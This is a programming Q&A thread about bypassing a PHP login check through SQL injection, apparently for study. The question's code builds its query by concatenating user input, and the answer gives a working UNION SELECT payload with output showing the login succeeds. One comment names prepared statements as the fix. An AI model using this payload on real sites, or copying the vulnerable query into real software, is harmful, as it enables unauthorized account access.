# I want to make SQL injection into checking login code. But it doesn't work

Tags: php, sql-injection

I'm studying SQL Injection with checking login code.
But it's hard to success the attack.

```
$check="select * from user_info where userid='$id'";
$result=$mysqli->query($check);
if($result->num_rows==1){
    $row=$result->fetch_array(MYSQLI_ASSOC);
    if($row['userpw']==$pw){
        $_SESSION['userid']=$id;
```

In this code, there is no null check in $row['userpw']==$pw

So, I tried to make both side null, which can make injection successful.
like, put (id=' or 1=1 limit 1 ) and pw=null. But it doesnt't work.

I want to make $row['userpw'] becomes NULL, or the way injection be success.

Thank you for your help.

Comment: Do you actually have rows in the table where `userpw` is null? SQL injection can't make it return rows that don't exist.

Comment: Assuming that yout target is having userid=1234, pass $id to be `1234` and $pw to be `1 || 1==1` (pass these data thru POST or GET as appropriate). Then SQL injection should be successful in your case (that's why you should write your code in such as way to avoid SQL injection attacks, such as using parameterized prepared statements)

Answer (score -1):

You can use `UNION` to add a desired row to the query you have with an additional `SELECT` statement. The attack might look like this (using PDO instead of MySQLi, but the methods are similar):

```
$id = '\' UNION SELECT null, \'secret\' WHERE \'\' = \'';
$pw = 'secret';
$check="select * from user_info where userid='$id'";
var_dump($check);
$result=$dbh->query($check);
if($result->rowCount()==1){
    $row=$result->fetch(PDO::FETCH_ASSOC);
    var_dump($row);
    if($row['userpw']==$pw){
        echo "valid";
    }
}
```

When you run this example you get the following output:

```
string(91) "select * from user_info where userid='' UNION SELECT null, 'secret' WHERE '' = ''"
array(2) {
  ["userid"]=>
  NULL
  ["userpw"]=>
  string(6) "secret"
}
valid
```

The first `SELECT` query will return no rows. After that you add the second `SELECT` query with `UNION`. In this case you add the values you want like `null` for the `userid` column and `'secret'` for the password to match in the `if($row['userpw']==$pw)` condition.